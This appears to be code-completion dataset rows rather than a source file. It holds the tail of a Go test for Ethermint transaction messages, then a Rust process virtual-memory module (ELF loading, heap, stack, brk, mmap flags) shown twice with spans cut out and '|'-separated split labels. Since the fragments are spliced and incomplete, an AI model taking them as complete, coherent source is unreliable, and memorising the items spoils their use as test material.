addr := ethcmn.BytesToAddress(priv.PubKey().Address().Bytes())
amount, gasPrice, gasLimit := int64(1024), int64(2048), uint64(100000)
expectedFee := gasPrice * int64(gasLimit)
expectCost := expectedFee + amount
msg := NewMsgEthereumTx(0, &addr, big.NewInt(amount), gasLimit, big.NewInt(gasPrice), []byte("test"))
require.Equal(t, gasLimit, msg.GetGas())
require.True(t, big.NewInt(expectedFee).Cmp(msg.Fee()) == 0)
require.True(t, big.NewInt(expectCost).Cmp(msg.Cost()) == 0)
// RawSignatureValues must echo back whatever V/R/S were set.
expectedV, expectedR, expectedS := big.NewInt(1), big.NewInt(2), big.NewInt(3)
msg.Data.V, msg.Data.R, msg.Data.S = expectedV, expectedR, expectedS
v, r, s := msg.RawSignatureValues()
require.True(t, expectedV.Cmp(v) == 0)
require.True(t, expectedR.Cmp(r) == 0)
require.True(t, expectedS.Cmp(s) == 0)
}
// TestMarshalAndUnmarshalLogs round-trips a slice of ethereum Logs (and an
// empty slice) through amino JSON and spot-checks the recovered fields.
func TestMarshalAndUnmarshalLogs(t *testing.T) {
var cdc = codec.New()
logs := []*ethtypes.Log{
{
Address: ethcmn.BytesToAddress([]byte{0x11}),
TxHash: ethcmn.HexToHash("0x01"),
// May need to find workaround since Topics is required to unmarshal from JSON
Topics: []ethcmn.Hash{},
Removed: true,
},
{Address: ethcmn.BytesToAddress([]byte{0x01, 0x11}), Topics: []ethcmn.Hash{}},
}
raw, err := codec.MarshalJSONIndent(cdc, logs)
require.NoError(t, err)
var logs2 []*ethtypes.Log
err = cdc.UnmarshalJSON(raw, &logs2)
require.NoError(t, err)
require.Len(t, logs2, 2)
require.Equal(t, logs[0].Address, logs2[0].Address)
require.Equal(t, logs[0].TxHash, logs2[0].TxHash)
require.True(t, logs[0].Removed)
// An empty slice must also survive the round trip.
emptyLogs := []*ethtypes.Log{}
raw, err = codec.MarshalJSONIndent(cdc, emptyLogs)
require.NoError(t, err)
err = cdc.UnmarshalJSON(raw, &logs2)
require.NoError(t, err)
}
func TestMsgString(t *testing.T) {
expectedUint64, expectedSDKAddr, expectedInt := uint64(1024), newSdkAddress(), sdk.OneInt()
expectedPayload, err := hexutil.Decode("0x1234567890abcdef")
require.NoError(t, err)
expectedOutput := fmt.Sprintf("nonce=1024 gasPrice=1 gasLimit=1024 recipient=%s amount=1 data=0x1234567890abcdef from=%s",
expectedSDKAddr, expectedSDKAddr)
msgEthermint := NewMsgEthermint(expectedUint64, &expectedSDKAddr, expectedInt, expectedUint64, expectedInt, expectedPayload, expectedSDKAddr)
require.True(t, strings.EqualFold(msgEthermint.String(), expectedOutput))
expectedHexAddr := ethcmn.BytesToAddress([]byte{0x01})
expectedBigInt := big.NewInt(1024)
expectedOutput = fmt.Sprintf("nonce=1024 price=1024 gasLimit=1024 recipient=%s amount=1024 data=0x1234567890abcdef v=0 r=0 s=0", expectedHexAddr.Hex())
msgEthereumTx := NewMsgEthereumTx(expectedUint64, &expectedHexAddr, expectedBigInt, expectedUint64, expectedBigInt, expectedPayload)
require.True(t, strings.EqualFold(msgEthereumTx.String(), expectedOutput))
} | random_line_split | |
process_vm.rs | use super::*;
use super::chunk::*;
use super::user_space_vm::USER_SPACE_VM_MANAGER;
use super::vm_area::VMArea;
use super::vm_perms::VMPerms;
use super::vm_util::{
FileBacked, VMInitializer, VMMapAddr, VMMapOptions, VMMapOptionsBuilder, VMRemapOptions,
};
use crate::config;
use crate::ipc::SHM_MANAGER;
use crate::process::elf_file::{ElfFile, ProgramHeaderExt};
use crate::util::sync::rw_lock::RwLockWriteGuard;
use std::collections::HashSet;
// Used for heap and stack start address randomization.
const RANGE_FOR_RANDOMIZATION: usize = 256 * 4096; // 1M
/// Builder collecting the sizing inputs (ELF images, heap/stack/mmap sizes)
/// needed to lay out and allocate a new process VM via `build`.
#[derive(Debug, Clone)]
pub struct ProcessVMBuilder<'a, 'b> {
// ELF images to load into the new address space.
elfs: Vec<&'b ElfFile<'a>>,
// Optional overrides; `build` falls back to the LibOS config defaults.
heap_size: Option<usize>,
stack_size: Option<usize>,
mmap_size: Option<usize>,
}
impl<'a, 'b> ProcessVMBuilder<'a, 'b> {
pub fn new(elfs: Vec<&'b ElfFile<'a>>) -> ProcessVMBuilder<'a, 'b> {
ProcessVMBuilder {
elfs: elfs,
heap_size: None,
stack_size: None,
mmap_size: None,
}
}
pub fn set_heap_size(&mut self, heap_size: usize) -> &mut Self {
self.heap_size = Some(heap_size);
self
}
pub fn set_stack_size(&mut self, stack_size: usize) -> &mut Self {
self.stack_size = Some(stack_size);
self
}
pub fn set_mmap_size(&mut self, mmap_size: usize) -> &mut Self {
self.mmap_size = Some(mmap_size);
self
}
// Generate a random address within [0, range]
// Note: This function doesn't guarantee alignment
fn get_randomize_offset(range: usize) -> usize {
if cfg!(debug_assertions) {
return range;
}
use crate::misc;
trace!("entropy size = {}", range);
let mut random_buf: [u8; 8] = [0u8; 8]; // same length as usize
misc::get_random(&mut random_buf).expect("failed to get random number");
let random_num: usize = u64::from_le_bytes(random_buf) as usize;
random_num % range
}
pub fn build(self) -> Result<ProcessVM> {
self.validate()?;
let heap_size = self
.heap_size
.unwrap_or(config::LIBOS_CONFIG.process.default_heap_size);
let stack_size = self
.stack_size
.unwrap_or(config::LIBOS_CONFIG.process.default_stack_size);
// Before allocating memory, let's first calculate how much memory
// we need in total by iterating the memory layouts required by
// all the memory regions
let elf_layouts: Vec<VMLayout> = self
.elfs
.iter()
.map(|elf| {
elf.program_headers()
.filter(|segment| segment.loadable())
.fold(VMLayout::new_empty(), |mut elf_layout, segment| {
let segment_size = (segment.p_vaddr + segment.p_memsz) as usize;
let segment_align = segment.p_align as usize;
let segment_layout = VMLayout::new(segment_size, segment_align).unwrap();
elf_layout.extend(&segment_layout);
elf_layout
})
})
.collect();
// Make heap and stack 16-byte aligned
let other_layouts = vec![
VMLayout::new(heap_size, 16)?,
VMLayout::new(stack_size, 16)?,
];
let process_layout = elf_layouts.iter().chain(other_layouts.iter()).fold(
VMLayout::new_empty(),
|mut process_layout, sub_layout| {
process_layout.add(&sub_layout);
process_layout
},
);
// Now that we end up with the memory layout required by the process,
// let's allocate the memory for the process
let mut chunks = HashSet::new();
// Init the memory for ELFs in the process
let mut elf_ranges = Vec::with_capacity(2);
elf_layouts
.iter()
.zip(self.elfs.iter())
.map(|(elf_layout, elf_file)| {
let vm_option = VMMapOptionsBuilder::default()
.size(elf_layout.size())
.align(elf_layout.align())
.perms(VMPerms::ALL) // set it to read | write | exec for simplicity
.initializer(VMInitializer::ElfSpecific {
elf_file: elf_file.file_ref().clone(),
})
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (elf_range, chunk_ref) =
USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(elf_range.start() % elf_layout.align() == 0);
chunks.insert(chunk_ref);
Self::init_elf_memory(&elf_range, elf_file).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
trace!("elf range = {:?}", elf_range);
elf_ranges.push(elf_range);
Ok(())
})
.collect::<Result<()>>()?;
// Init the heap memory in the process
let heap_layout = &other_layouts[0];
let vm_option = VMMapOptionsBuilder::default()
.size(heap_layout.size())
.align(heap_layout.align())
.perms(VMPerms::READ | VMPerms::WRITE)
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (heap_range, chunk_ref) = USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(heap_range.start() % heap_layout.align() == 0);
trace!("heap range = {:?}", heap_range);
let brk = RwLock::new(heap_range.start());
chunks.insert(chunk_ref);
// Init the stack memory in the process
let stack_layout = &other_layouts[1];
let vm_option = VMMapOptionsBuilder::default()
.size(stack_layout.size())
.align(heap_layout.align())
.perms(VMPerms::READ | VMPerms::WRITE)
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (stack_range, chunk_ref) = USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(stack_range.start() % stack_layout.align() == 0);
chunks.insert(chunk_ref);
trace!("stack range = {:?}", stack_range);
let mem_chunks = Arc::new(RwLock::new(chunks));
Ok(ProcessVM {
elf_ranges,
heap_range,
stack_range,
brk,
mem_chunks,
})
}
fn validate(&self) -> Result<()> {
let validate_size = |size_opt| -> Result<()> {
if let Some(size) = size_opt {
if size == 0 || size % PAGE_SIZE != 0 {
return_errno!(EINVAL, "invalid size");
}
}
Ok(())
};
validate_size(self.heap_size)?;
validate_size(self.stack_size)?;
validate_size(self.mmap_size)?;
Ok(())
}
fn handle_error_when_init(&self, chunks: &HashSet<Arc<Chunk>>) {
chunks.iter().for_each(|chunk| {
USER_SPACE_VM_MANAGER
.internal()
.munmap_chunk(chunk, None, false);
});
}
fn init_elf_memory(elf_range: &VMRange, elf_file: &ElfFile) -> Result<()> {
// Destination buffer: ELF appeared in the process
let elf_proc_buf = unsafe { elf_range.as_slice_mut() };
// Source buffer: ELF stored in the ELF file
let elf_file_buf = elf_file.as_slice();
let base_load_address_offset = elf_file.base_load_address_offset() as usize;
// Offsets to track zerolized range
let mut empty_start_offset = 0;
let mut empty_end_offset = 0;
// Init all loadable segments
elf_file
.program_headers()
.filter(|segment| segment.loadable())
.for_each(|segment| {
let file_size = segment.p_filesz as usize;
let file_offset = segment.p_offset as usize;
let mem_addr = segment.p_vaddr as usize;
let mem_size = segment.p_memsz as usize;
let alignment = segment.p_align as usize;
debug_assert!(file_size <= mem_size);
let mem_start_offset = mem_addr - base_load_address_offset;
// Initialize empty part to zero based on alignment
empty_start_offset = align_down(mem_start_offset, alignment);
for b in &mut elf_proc_buf[empty_start_offset..mem_start_offset] {
*b = 0;
}
// Bytes of file_size length are loaded from the ELF file
elf_file.file_ref().read_at(
file_offset,
&mut elf_proc_buf[mem_start_offset..mem_start_offset + file_size],
);
// Set the remaining part to zero based on alignment
debug_assert!(file_size <= mem_size);
empty_end_offset = align_up(mem_start_offset + mem_size, alignment);
for b in &mut elf_proc_buf[mem_start_offset + file_size..empty_end_offset] {
*b = 0;
}
});
Ok(())
}
}
// MemChunks is the structure to track all the chunks which are used by this process.
// Shared (Arc) and guarded by a RwLock so multiple threads of the process
// can read or update the chunk set.
type MemChunks = Arc<RwLock<HashSet<ChunkRef>>>;
/// The per-process virtual memory
#[derive(Debug)]
pub struct ProcessVM {
// Where each ELF image of this process was loaded.
elf_ranges: Vec<VMRange>,
// Pre-allocated heap region; the program break moves within it.
heap_range: VMRange,
// Pre-allocated stack region.
stack_range: VMRange,
// Current program break (raw value, not page-aligned).
brk: RwLock<usize>,
// Memory safety notes: the mem_chunks field must be the last one.
//
// Rust drops fields in the same order as they are declared. So by making
// mem_chunks the last field, we ensure that when all other fields are
// dropped, their drop methods (if provided) can still access the memory
// region represented by the mem_chunks field.
mem_chunks: MemChunks,
}
impl Default for ProcessVM {
    /// An empty process VM: no ELF/heap/stack ranges, brk at zero, and an
    /// empty chunk set.
    fn default() -> ProcessVM {
        let mem_chunks = Arc::new(RwLock::new(HashSet::new()));
        ProcessVM {
            mem_chunks,
            elf_ranges: Default::default(),
            heap_range: Default::default(),
            stack_range: Default::default(),
            brk: Default::default(),
        }
    }
}
impl Drop for ProcessVM {
/// Last-resort cleanup of any chunks still owned by the process.
fn drop(&mut self) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
// There are two cases when this drop is called:
// (1) Process exits normally and in the end, drop process VM
// (2) During creating process stage, process VM is ready but there are some other errors when creating the process, e.g. spawn_attribute is set
// to a wrong value
//
// For the first case, the process VM is cleaned in the exit procedure and nothing is needed. For the second cases, mem_chunks is not empty and should
// be cleaned here.
// drain_filter removes the matching chunks from the set while iterating.
mem_chunks
.drain_filter(|chunk| chunk.is_single_vma())
.for_each(|chunk| {
USER_SPACE_VM_MANAGER
.internal()
.munmap_chunk(&chunk, None, false);
});
// Any chunk left at this point would indicate a cleanup bug.
assert!(mem_chunks.len() == 0);
info!("Process VM dropped");
}
}
impl ProcessVM {
/// Returns the set of memory chunks owned by this process.
pub fn mem_chunks(&self) -> &MemChunks {
&self.mem_chunks
}
/// Returns the stack address range.
pub fn stack_range(&self) -> &VMRange {
&self.stack_range
}
/// Returns the heap address range.
pub fn heap_range(&self) -> &VMRange {
&self.heap_range
}
/// Records a new chunk as belonging to this process.
pub fn add_mem_chunk(&self, chunk: ChunkRef) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
mem_chunks.insert(chunk);
}
/// Drops a chunk from this process' ownership set.
pub fn remove_mem_chunk(&self, chunk: &ChunkRef) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
mem_chunks.remove(chunk);
}
/// Swaps one owned chunk for another. Note: this takes the write lock
/// twice (remove then add), so the swap is not atomic as a whole.
pub fn replace_mem_chunk(&self, old_chunk: &ChunkRef, new_chunk: ChunkRef) {
self.remove_mem_chunk(old_chunk);
self.add_mem_chunk(new_chunk)
}
// Try merging all connecting single VMAs of the process.
// This is a very expensive operation.
/// Drains all non-shared single-VMA chunks from `mem_chunks`, merges any
/// adjacent compatible VMAs (the earlier VMA is emptied into the later one),
/// puts untouched chunks back, and returns the merged VMAs so the caller can
/// re-insert them as new chunks later.
pub fn merge_all_single_vma_chunks(
mem_chunks: &mut RwLockWriteGuard<HashSet<ChunkRef>>,
) -> Result<Vec<VMArea>> {
// Get all single VMA chunks
// Shared chunks shouldn't be merged since they are managed by shm manager and shared by multi processes
let mut single_vma_chunks = mem_chunks
.drain_filter(|chunk| chunk.is_single_vma() && !chunk.is_shared())
.collect::<Vec<ChunkRef>>();
// Sort by start address so only neighbors need to be compared.
single_vma_chunks.sort_unstable_by(|chunk_a, chunk_b| {
chunk_a
.range()
.start()
.partial_cmp(&chunk_b.range().start())
.unwrap()
});
// Try merging connecting single VMA chunks
for chunks in single_vma_chunks.windows(2) {
let chunk_a = &chunks[0];
let chunk_b = &chunks[1];
let mut vma_a = match chunk_a.internal() {
ChunkType::MultiVMA(_) => {
// Impossible: everything collected above passed is_single_vma().
unreachable!();
}
ChunkType::SingleVMA(vma) => vma.lock().unwrap(),
};
let mut vma_b = match chunk_b.internal() {
ChunkType::MultiVMA(_) => {
unreachable!();
}
ChunkType::SingleVMA(vma) => vma.lock().unwrap(),
};
if VMArea::can_merge_vmas(&vma_a, &vma_b) {
// Grow vma_b backwards to absorb vma_a's range.
let new_start = vma_a.start();
vma_b.set_start(new_start);
// set vma_a to zero
vma_a.set_end(new_start);
}
}
// Collect merged vmas which will be the output of this function
let mut merged_vmas = Vec::new();
// Insert unchanged chunks back to mem_chunks list and collect merged vmas for output
for chunk in single_vma_chunks.into_iter().filter_map(|chunk| {
// Chunks emptied by the merge loop above (dummy VMAs) are dropped.
if !chunk.is_single_dummy_vma() {
if chunk.is_single_vma_with_conflict_size() {
let new_vma = chunk.get_vma_for_single_vma_chunk().clone();
merged_vmas.push(new_vma);
// Don't insert the merged chunks to mem_chunk list here. It should be updated later.
None
} else {
Some(chunk)
}
} else {
None
}
}) {
mem_chunks.insert(chunk);
}
Ok(merged_vmas)
}
/// Returns the whole user-space range managed by the global VM manager
/// (shared across processes, not specific to this one).
pub fn get_process_range(&self) -> &VMRange {
USER_SPACE_VM_MANAGER.range()
}
/// Returns the ranges where this process' ELF images were loaded.
pub fn get_elf_ranges(&self) -> &[VMRange] {
&self.elf_ranges
}
/// Returns the heap range.
pub fn get_heap_range(&self) -> &VMRange {
&self.heap_range
}
/// Returns the stack range.
pub fn get_stack_range(&self) -> &VMRange {
&self.stack_range
}
/// Base address of the managed user-space region.
pub fn get_base_addr(&self) -> usize {
self.get_process_range().start()
}
/// Stack base, i.e. the highest stack address (the stack grows downward).
pub fn get_stack_base(&self) -> usize {
self.get_stack_range().end()
}
/// Lowest address the stack may occupy.
pub fn get_stack_limit(&self) -> usize {
self.get_stack_range().start()
}
/// Current program break (the raw value last set by `brk`).
pub fn get_brk(&self) -> usize {
*self.brk.read().unwrap()
}
/// Implements the brk syscall: moves the program break within the heap
/// range reserved at process creation.
///
/// Returns the new break on success. An out-of-range request does not
/// fail; it logs an error and returns the current break, mirroring Linux.
pub fn brk(&self, brk: usize) -> Result<usize> {
let heap_start = self.heap_range.start();
let heap_end = self.heap_range.end();
// Acquire lock first to avoid data-race.
let mut brk_guard = self.brk.write().unwrap();
if brk >= heap_start && brk <= heap_end {
// Get page-aligned brk address.
let new_brk = align_up(brk, PAGE_SIZE);
// Get page-aligned old brk address.
let old_brk = align_up(*brk_guard, PAGE_SIZE);
// Reset the memory when brk shrinks.
if new_brk < old_brk {
let shrink_brk_range =
VMRange::new(new_brk, old_brk).expect("shrink brk range must be valid");
USER_SPACE_VM_MANAGER.reset_memory(shrink_brk_range)?;
}
// Return the user-specified brk address without page aligned. This is same as Linux.
*brk_guard = brk;
Ok(brk)
} else {
if brk < heap_start {
error!("New brk address is too low");
} else if brk > heap_end {
error!("New brk address is too high");
}
Ok(*brk_guard)
}
}
// Get a NON-accurate free size for current process
/// Sums the free bytes reported by every chunk owned by this process and
/// adds the global free space of the user-space VM manager. Best-effort
/// only: the numbers can change concurrently.
pub fn get_free_size(&self) -> usize {
    let chunk_free_size = {
        let process_chunks = self.mem_chunks.read().unwrap();
        process_chunks
            .iter()
            .map(|chunk| chunk.free_size())
            .sum::<usize>()
    };
    chunk_free_size + USER_SPACE_VM_MANAGER.free_size()
}
/// Implements the mmap syscall for this process.
///
/// `addr` is forced when MAP_FIXED is set, otherwise treated as a hint
/// (or ignored when zero). Anonymous mappings get no initializer here —
/// memory is cleaned after munmap instead — while file-backed mappings
/// are loaded from `fd` at `offset`. Returns the mapping's start address.
///
/// Fix: replaced the `if … { true } else { false }` anti-pattern for
/// `need_write_back` and flattened the needless nesting; behavior is
/// unchanged.
pub fn mmap(
    &self,
    addr: usize,
    size: usize,
    perms: VMPerms,
    flags: MMapFlags,
    fd: FileDesc,
    offset: usize,
) -> Result<usize> {
    let addr_option = if flags.contains(MMapFlags::MAP_FIXED) {
        VMMapAddr::Force(addr)
    } else if addr == 0 {
        VMMapAddr::Any
    } else {
        VMMapAddr::Hint(addr)
    };
    let initializer = if flags.contains(MMapFlags::MAP_ANONYMOUS) {
        // There is no need to fill zeros in mmap. Cleaning is done after munmap.
        VMInitializer::DoNothing()
    } else {
        let file_ref = current!().file(fd)?;
        // Only shared, file-backed memory mappings have write-back files
        let need_write_back = flags.contains(MMapFlags::MAP_SHARED);
        VMInitializer::FileBacked {
            file: FileBacked::new(file_ref, offset, need_write_back),
        }
    };
    let mmap_options = VMMapOptionsBuilder::default()
        .size(size)
        .addr(addr_option)
        .perms(perms)
        .initializer(initializer)
        .build()?;
    let mmap_addr = USER_SPACE_VM_MANAGER.mmap(&mmap_options)?;
    Ok(mmap_addr)
}
/// Implements the mremap syscall: resizes (and possibly moves) an existing
/// mapping according to `flags`, delegating to the global VM manager.
pub fn mremap(
    &self,
    old_addr: usize,
    old_size: usize,
    new_size: usize,
    flags: MRemapFlags,
) -> Result<usize> {
    let options = VMRemapOptions::new(old_addr, old_size, new_size, flags)?;
    USER_SPACE_VM_MANAGER.mremap(&options)
}
/// Implements the munmap syscall by delegating to the global VM manager.
pub fn munmap(&self, addr: usize, size: usize) -> Result<()> {
USER_SPACE_VM_MANAGER.munmap(addr, size)
}
/// Implements the mprotect syscall for this process.
///
/// A zero-sized request is a no-op; otherwise `size` is rounded up to the
/// page size before the permissions change is applied.
///
/// Fixes: the `protect_range` binding was never used — the range
/// construction is kept purely for its validation/error effect — and the
/// trailing `return` statement is now a tail expression.
pub fn mprotect(&self, addr: usize, size: usize, perms: VMPerms) -> Result<()> {
    if size == 0 {
        return Ok(());
    }
    let size = align_up(size, PAGE_SIZE);
    // Validate that [addr, addr + size) forms a proper range before
    // touching the VM manager; propagate the error otherwise.
    VMRange::new_with_size(addr, size)?;
    USER_SPACE_VM_MANAGER.mprotect(addr, size, perms)
}
pub fn msync(&self, addr: usize, size: usize) -> Result<()> |
/// Delegates an msync over every mapping backed by `sync_file` to the
/// global VM manager.
pub fn msync_by_file(&self, sync_file: &FileRef) {
return USER_SPACE_VM_MANAGER.msync_by_file(sync_file);
}
// Return: a copy of the found region
/// Looks up the mmap region containing `addr` via the global VM manager.
pub fn find_mmap_region(&self, addr: usize) -> Result<VMRange> {
USER_SPACE_VM_MANAGER.find_mmap_region(addr)
}
}
bitflags! {
/// mmap flag bits, matching the Linux ABI values.
pub struct MMapFlags : u32 {
const MAP_FILE = 0x0;
const MAP_SHARED = 0x1;
const MAP_PRIVATE = 0x2;
const MAP_SHARED_VALIDATE = 0x3;
// Mask covering the sharing-type bits above.
const MAP_TYPE = 0xf;
const MAP_FIXED = 0x10;
const MAP_ANONYMOUS = 0x20;
const MAP_GROWSDOWN = 0x100;
const MAP_DENYWRITE = 0x800;
const MAP_EXECUTABLE = 0x1000;
const MAP_LOCKED = 0x2000;
const MAP_NORESERVE = 0x4000;
const MAP_POPULATE = 0x8000;
const MAP_NONBLOCK = 0x10000;
const MAP_STACK = 0x20000;
const MAP_HUGETLB = 0x40000;
const MAP_SYNC = 0x80000;
const MAP_FIXED_NOREPLACE = 0x100000;
}
}
impl MMapFlags {
/// Parses raw mmap flag bits from the syscall interface; unknown bits
/// yield EINVAL.
pub fn from_u32(bits: u32) -> Result<MMapFlags> {
// TODO: detect non-supporting flags
MMapFlags::from_bits(bits).ok_or_else(|| errno!(EINVAL, "unknown mmap flags"))
}
}
// TODO: Support MREMAP_DONTUNMAP flag (since Linux 5.7)
/// Parsed mremap flags; `FixedAddr` carries the requested destination.
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum MRemapFlags {
None,
MayMove,
FixedAddr(usize),
}
impl MRemapFlags {
    /// Parses the raw mremap flag bits from the syscall interface.
    /// `new_addr` is only meaningful for MREMAP_FIXED requests.
    pub fn from_raw(raw_flags: u32, new_addr: usize) -> Result<Self> {
        const MREMAP_NONE: u32 = 0;
        const MREMAP_MAYMOVE: u32 = 1;
        const MREMAP_FIXED: u32 = 3;
        #[deny(unreachable_patterns)]
        let parsed = match raw_flags {
            MREMAP_NONE => Self::None,
            MREMAP_MAYMOVE => Self::MayMove,
            MREMAP_FIXED => Self::FixedAddr(new_addr),
            _ => return_errno!(EINVAL, "unsupported flags"),
        };
        Ok(parsed)
    }

    /// Returns the requested fixed destination address, if any.
    pub fn new_addr(&self) -> Option<usize> {
        if let MRemapFlags::FixedAddr(new_addr) = self {
            Some(*new_addr)
        } else {
            None
        }
    }
}
impl Default for MRemapFlags {
fn default() -> Self {
MRemapFlags::None
}
}
bitflags! {
/// msync flag bits, matching the Linux ABI values.
pub struct MSyncFlags : u32 {
const MS_ASYNC = 0x1;
const MS_INVALIDATE = 0x2;
const MS_SYNC = 0x4;
}
}
impl MSyncFlags {
/// Parses raw msync flags, rejecting unknown bits and the invalid
/// combination of MS_ASYNC together with MS_SYNC.
pub fn from_u32(bits: u32) -> Result<Self> {
let flags =
MSyncFlags::from_bits(bits).ok_or_else(|| errno!(EINVAL, "containing unknown bits"))?;
if flags.contains(Self::MS_ASYNC | Self::MS_SYNC) {
return_errno!(EINVAL, "must be either sync or async");
}
Ok(flags)
}
}
| {
return USER_SPACE_VM_MANAGER.msync(addr, size);
} | identifier_body |
process_vm.rs | use super::*;
use super::chunk::*;
use super::user_space_vm::USER_SPACE_VM_MANAGER;
use super::vm_area::VMArea;
use super::vm_perms::VMPerms;
use super::vm_util::{
FileBacked, VMInitializer, VMMapAddr, VMMapOptions, VMMapOptionsBuilder, VMRemapOptions,
};
use crate::config;
use crate::ipc::SHM_MANAGER;
use crate::process::elf_file::{ElfFile, ProgramHeaderExt};
use crate::util::sync::rw_lock::RwLockWriteGuard;
use std::collections::HashSet;
// Used for heap and stack start address randomization.
const RANGE_FOR_RANDOMIZATION: usize = 256 * 4096; // 1M
#[derive(Debug, Clone)]
pub struct ProcessVMBuilder<'a, 'b> {
elfs: Vec<&'b ElfFile<'a>>,
heap_size: Option<usize>,
stack_size: Option<usize>,
mmap_size: Option<usize>,
}
impl<'a, 'b> ProcessVMBuilder<'a, 'b> {
pub fn new(elfs: Vec<&'b ElfFile<'a>>) -> ProcessVMBuilder<'a, 'b> {
ProcessVMBuilder {
elfs: elfs,
heap_size: None,
stack_size: None,
mmap_size: None,
}
}
pub fn set_heap_size(&mut self, heap_size: usize) -> &mut Self {
self.heap_size = Some(heap_size);
self
}
pub fn set_stack_size(&mut self, stack_size: usize) -> &mut Self {
self.stack_size = Some(stack_size);
self
}
pub fn set_mmap_size(&mut self, mmap_size: usize) -> &mut Self {
self.mmap_size = Some(mmap_size);
self
}
// Generate a random address within [0, range]
// Note: This function doesn't guarantee alignment
fn get_randomize_offset(range: usize) -> usize {
if cfg!(debug_assertions) {
return range;
}
use crate::misc;
trace!("entropy size = {}", range);
let mut random_buf: [u8; 8] = [0u8; 8]; // same length as usize
misc::get_random(&mut random_buf).expect("failed to get random number");
let random_num: usize = u64::from_le_bytes(random_buf) as usize;
random_num % range
}
pub fn build(self) -> Result<ProcessVM> {
self.validate()?;
let heap_size = self
.heap_size
.unwrap_or(config::LIBOS_CONFIG.process.default_heap_size);
let stack_size = self
.stack_size
.unwrap_or(config::LIBOS_CONFIG.process.default_stack_size);
// Before allocating memory, let's first calculate how much memory
// we need in total by iterating the memory layouts required by
// all the memory regions
let elf_layouts: Vec<VMLayout> = self
.elfs
.iter()
.map(|elf| {
elf.program_headers()
.filter(|segment| segment.loadable())
.fold(VMLayout::new_empty(), |mut elf_layout, segment| { | elf_layout.extend(&segment_layout);
elf_layout
})
})
.collect();
// Make heap and stack 16-byte aligned
let other_layouts = vec![
VMLayout::new(heap_size, 16)?,
VMLayout::new(stack_size, 16)?,
];
let process_layout = elf_layouts.iter().chain(other_layouts.iter()).fold(
VMLayout::new_empty(),
|mut process_layout, sub_layout| {
process_layout.add(&sub_layout);
process_layout
},
);
// Now that we end up with the memory layout required by the process,
// let's allocate the memory for the process
let mut chunks = HashSet::new();
// Init the memory for ELFs in the process
let mut elf_ranges = Vec::with_capacity(2);
elf_layouts
.iter()
.zip(self.elfs.iter())
.map(|(elf_layout, elf_file)| {
let vm_option = VMMapOptionsBuilder::default()
.size(elf_layout.size())
.align(elf_layout.align())
.perms(VMPerms::ALL) // set it to read | write | exec for simplicity
.initializer(VMInitializer::ElfSpecific {
elf_file: elf_file.file_ref().clone(),
})
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (elf_range, chunk_ref) =
USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(elf_range.start() % elf_layout.align() == 0);
chunks.insert(chunk_ref);
Self::init_elf_memory(&elf_range, elf_file).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
trace!("elf range = {:?}", elf_range);
elf_ranges.push(elf_range);
Ok(())
})
.collect::<Result<()>>()?;
// Init the heap memory in the process
let heap_layout = &other_layouts[0];
let vm_option = VMMapOptionsBuilder::default()
.size(heap_layout.size())
.align(heap_layout.align())
.perms(VMPerms::READ | VMPerms::WRITE)
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (heap_range, chunk_ref) = USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(heap_range.start() % heap_layout.align() == 0);
trace!("heap range = {:?}", heap_range);
let brk = RwLock::new(heap_range.start());
chunks.insert(chunk_ref);
// Init the stack memory in the process
let stack_layout = &other_layouts[1];
let vm_option = VMMapOptionsBuilder::default()
.size(stack_layout.size())
.align(heap_layout.align())
.perms(VMPerms::READ | VMPerms::WRITE)
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (stack_range, chunk_ref) = USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(stack_range.start() % stack_layout.align() == 0);
chunks.insert(chunk_ref);
trace!("stack range = {:?}", stack_range);
let mem_chunks = Arc::new(RwLock::new(chunks));
Ok(ProcessVM {
elf_ranges,
heap_range,
stack_range,
brk,
mem_chunks,
})
}
fn validate(&self) -> Result<()> {
let validate_size = |size_opt| -> Result<()> {
if let Some(size) = size_opt {
if size == 0 || size % PAGE_SIZE != 0 {
return_errno!(EINVAL, "invalid size");
}
}
Ok(())
};
validate_size(self.heap_size)?;
validate_size(self.stack_size)?;
validate_size(self.mmap_size)?;
Ok(())
}
fn handle_error_when_init(&self, chunks: &HashSet<Arc<Chunk>>) {
chunks.iter().for_each(|chunk| {
USER_SPACE_VM_MANAGER
.internal()
.munmap_chunk(chunk, None, false);
});
}
fn init_elf_memory(elf_range: &VMRange, elf_file: &ElfFile) -> Result<()> {
// Destination buffer: ELF appeared in the process
let elf_proc_buf = unsafe { elf_range.as_slice_mut() };
// Source buffer: ELF stored in the ELF file
let elf_file_buf = elf_file.as_slice();
let base_load_address_offset = elf_file.base_load_address_offset() as usize;
// Offsets to track zerolized range
let mut empty_start_offset = 0;
let mut empty_end_offset = 0;
// Init all loadable segments
elf_file
.program_headers()
.filter(|segment| segment.loadable())
.for_each(|segment| {
let file_size = segment.p_filesz as usize;
let file_offset = segment.p_offset as usize;
let mem_addr = segment.p_vaddr as usize;
let mem_size = segment.p_memsz as usize;
let alignment = segment.p_align as usize;
debug_assert!(file_size <= mem_size);
let mem_start_offset = mem_addr - base_load_address_offset;
// Initialize empty part to zero based on alignment
empty_start_offset = align_down(mem_start_offset, alignment);
